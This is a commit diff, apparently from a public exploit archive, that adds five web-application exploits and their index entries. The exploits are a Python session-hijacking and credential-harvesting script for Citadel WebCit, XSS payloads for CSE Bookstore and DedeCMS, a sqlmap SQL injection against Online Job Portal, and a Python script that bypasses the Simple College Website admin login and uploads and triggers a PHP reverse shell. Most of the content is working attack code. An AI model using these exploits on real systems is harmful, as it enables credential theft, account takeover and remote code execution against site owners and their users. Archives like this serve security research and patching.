DB: 2020-10-31

5 changes to exploits/shellcodes CSE Bookstore 1.0 - 'quantity' Persistent Cross-site Scripting DedeCMS v.5.8 - _keyword_ Cross-Site Scripting Citadel WebCit < 926 - Session Hijacking Exploit Online Job Portal 1.0 - 'userid' SQL Injection Simple College Website 1.0 - 'username' SQL Injection / Remote Code Execution
2020-10-31 05:02:05 +00:00 · 2020-10-31 05:02:05 +00:00 · d852416732
commit d852416732
parent 48bd7b3ea6
6 changed files with 177 additions and 0 deletions
--- a/exploits/multiple/webapps/48975.py
+++ b/exploits/multiple/webapps/48975.py
@ -0,0 +1,63 @@
+# Exploit Title: Citadel WebCit < 926 - Session Hijacking Exploit
+# Exploit Author: Simone Quatrini
+# Version: 926
+
+#!/usr/bin/env python3
+import argparse
+import requests
+import time
+import sys
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+
+
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+
+parser = argparse.ArgumentParser(description="Webcit <= 926 Session Hijacking")
+parser.add_argument('--url', action='store', dest='url', required=True, help="Full URL and port e.g.: http://192.168.1.111:8080/")
+parser.add_argument('--verbose', '-v', action='store_true', required=False, help="Shows the full response")
+args = parser.parse_args()
+
+url = args.url
+verbose = args.verbose
+
+
+def check_endpoint(url):
+	headers = {'User-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'}
+	response = requests.get(url+'/dotskip?room=_BASEROOM_', headers=headers, verify=False)
+	if response.status_code == 200:
+		print("[+] WebCit is reachable\n")
+	else:
+		print("\n[-] WebCit response code: ", response.status_code)
+		sys.exit()
+		
+def harvesting(url, verbose):
+	#Current Timestamp
+	epoch_time = int(time.time())
+	#harvesting technique only search for user that logged-in within the last ~20 minutes.
+	#increase the search_back_in variable's number to search even backwards (it will require more time and requests)
+	#Also, make sure that you're using the same timezone of the server
+	search_back_in = 999
+	print("[/] Credential harvesting in progress...")
+	while search_back_in > 0:
+		payload = str(epoch_time-search_back_in)+'|||||'
+		payload_hex = payload.encode(encoding='utf_8').hex()
+		headers = {'User-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36','Cookie':'webcit='+payload_hex+''}
+		response = requests.get(url+'/dotskip?room=_BASEROOM_', headers=headers, verify=False)
+		try:
+			cookievalue = bytes.fromhex(response.cookies['webcit'])
+			cookievalue = cookievalue.decode(encoding='utf_8')
+			parts = cookievalue.split('|')
+			
+			if ((len(parts[1])) and (len(parts[2]))):
+				print("Credential found: ", cookievalue)
+			
+		except:
+			if(verbose):
+				print("[-] Invalid returned cookie value not valid, skipping")
+		search_back_in = search_back_in - 1
+	print("[+] Credential harvesting done.")
+	
+# Default actions if only '--url' is passed
+check_endpoint(url)
+harvesting(url, verbose)
--- a/exploits/php/webapps/48973.txt
+++ b/exploits/php/webapps/48973.txt
@ -0,0 +1,17 @@
+# Exploit Title: CSE Bookstore 1.0 - 'quantity' Persistent Cross-site Scripting
+# Date: 30/10/2020
+# Exploit Author: Vyshnav NK
+# Vendor Homepage: https://projectworlds.in/
+# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
+# Version: 1.0
+# Tested on: Windows 10 and Windows 7
+
+CSE Bookstore is vulnerable to a Persistent Cross-site scripting  on Checkout.php and cartp.php, Where an user can able to add quantity as an XSS Payload and once added each time when we click on MyCart option it triggers as stored one
+
+The below URL can be accessed by a User
+
+URL :  http://localhost/php/checkout.php and http://localhost/php/cart.php
+
+Payload : "><svg/onload=alert(5)>
+
+Insert XSS Payload into Quantity Section
--- a/exploits/php/webapps/48974.txt
+++ b/exploits/php/webapps/48974.txt
@ -0,0 +1,27 @@
+# Exploit Title:  DedeCMS v.5.8 - "keyword" Cross-Site Scripting
+# Date: 2020-07-27
+# Exploit Author: Noth
+# Vendor Homepage: https://github.com/dedetech/DedeCMSv5
+# Software Link: https://github.com/dedetech/DedeCMSv5
+# Version: v.5.8
+# CVE : CVE-2020-27533
+
+A Cross Site Scripting (XSS) issue was discovered in the search feature of DedeCMS v.5.8 that allows malicious users to inject code into web pages, and other users will be affected when viewing web pages.
+
+PoC :
+
+POST /DedeCMSv5-master/src/dede/action_search.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 47
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/DedeCMSv5-master/src/dede/
+Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=dgj9gs48q9nbrckdq0ei5grjd7; _csrf_name_7ac3ea0e=8a824367d97bb8f984d4af7a1ad11308; _csrf_name_7ac3ea0e__ckMd5=c692dd4f707ea756; DedeUserID=1; DedeUserID__ckMd5=7e44b1ee92d784aa; DedeLoginTime=1603530632; DedeLoginTime__ckMd5=69967c5a8db15fb4; dede_csrf_token=80866e4429220e784f2514d38de9a5ea; dede_csrf_token__ckMd5=de396c60d5d75d93
+Upgrade-Insecure-Requests: 1
+
+keyword="><script>alert(1)</script>
--- a/exploits/php/webapps/48976.txt
+++ b/exploits/php/webapps/48976.txt
@ -0,0 +1,17 @@
+# Exploit Title: Online Job Portal 1.0 - 'userid' SQL Injection
+# Google Dork: N/A
+# Date: 2020/10/28
+# Exploit Author: Akıner Kısa
+# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
+# Version: 1.0
+# Tested on: XAMPP 
+# CVE : N/A
+
+# Vulnerable URL: http://localhost/jobportal/Admin/EditUser.php?UserId='
+
+Proof of Concept:
+
+1. See vulnerable url.
+
+2. Open sqlmap and use " sqlmap -u "http://localhost/jobportal/Admin/EditUser.php?UserId='" --dbs " command.
--- a/exploits/php/webapps/48977.py
+++ b/exploits/php/webapps/48977.py
@ -0,0 +1,48 @@
+# Exploit Title: Simple College Website 1.0 - SQL Injection / Remote Code Execution
+# Date: 30-10-2020
+# Exploit Author: yunaranyancat
+# Vendor Homepage: https://www.sourcecodester.com/php/14548/simple-college-website-using-htmlphpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-college-website.zip
+# Version: 1.0
+# Tested on: Ubuntu 18.04 + XAMPP 7.4.11
+# CVE ID : N/A
+
+# replace revshell.php with your own php reverse shell
+# change [TARGET URL] to target URL or IP address
+# setup your netcat listener for sum good ol shellz
+
+#!/usr/bin/python3
+
+import requests
+import time
+
+def sqli_admin():
+	s = requests.Session()
+	data = {"username":"admin' or 1=1#","password":"hacked"}
+	adminlogin = "http://[TARGET URL]/college_website/admin/ajax.php?action=login"
+	s.post(adminlogin,data=data)
+	return s
+
+def trigger_rce(session):
+	starttime = int(time.time())
+	multipart_form_data = {
+	"name": ("College of Hackers"),
+	"email": ("test@test.com"),
+	"contact" : ("+11111111111"),
+	"about" : ("Nothing much about it"),
+	"img" : ("revshell.php", open("revshell.php", "rb"))
+	}
+	session.post("http://[TARGET URL]/alumni/admin/ajax.php?action=save_settings", files=multipart_form_data)
+	get_shell(starttime-100,starttime+100,session)
+
+
+def get_shell(start,end,session):
+	for i in range(start,end):
+		session.get("http://[TARGET URL]/alumni/admin/assets/uploads/"+str(i)+"_revshell.php")
+
+def main():
+	session = sqli_admin()
+	trigger_rce(session)
+
+if __name__ == '__main__':
+	main()
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -40791,6 +40791,11 @@ id,file,description,date,author,type,platform,port
 48970,exploits/cgi/webapps/48970.txt,"Mailman 1.x > 2.1.23 - Cross Site Scripting (XSS)",2020-10-29,"Valerio Alessandroni",webapps,cgi,
 48971,exploits/java/webapps/48971.py,"WebLogic Server 10.3.6.0.0 / 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 - Unauthenticated RCE via GET request",2020-10-29,"Mohammed Althibyani",webapps,java,
 48972,exploits/hardware/webapps/48972.txt,"Genexis Platinum-4410 P4410-V2-1.28 - Cross Site Request Forgery to Reboot",2020-10-29,"Mohammed Farhan",webapps,hardware,
+48973,exploits/php/webapps/48973.txt,"CSE Bookstore 1.0 - 'quantity' Persistent Cross-site Scripting",2020-10-30,"Vyshnav nk",webapps,php,
+48974,exploits/php/webapps/48974.txt,"DedeCMS v.5.8 - _keyword_ Cross-Site Scripting",2020-10-30,Noth,webapps,php,
+48975,exploits/multiple/webapps/48975.py,"Citadel WebCit < 926 - Session Hijacking Exploit",2020-10-30,"Simone Quatrini",webapps,multiple,
+48976,exploits/php/webapps/48976.txt,"Online Job Portal 1.0 - 'userid' SQL Injection",2020-10-30,"Akıner Kısa",webapps,php,
+48977,exploits/php/webapps/48977.py,"Simple College Website 1.0 - 'username' SQL Injection / Remote Code Execution",2020-10-30,yunaranyancat,webapps,php,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,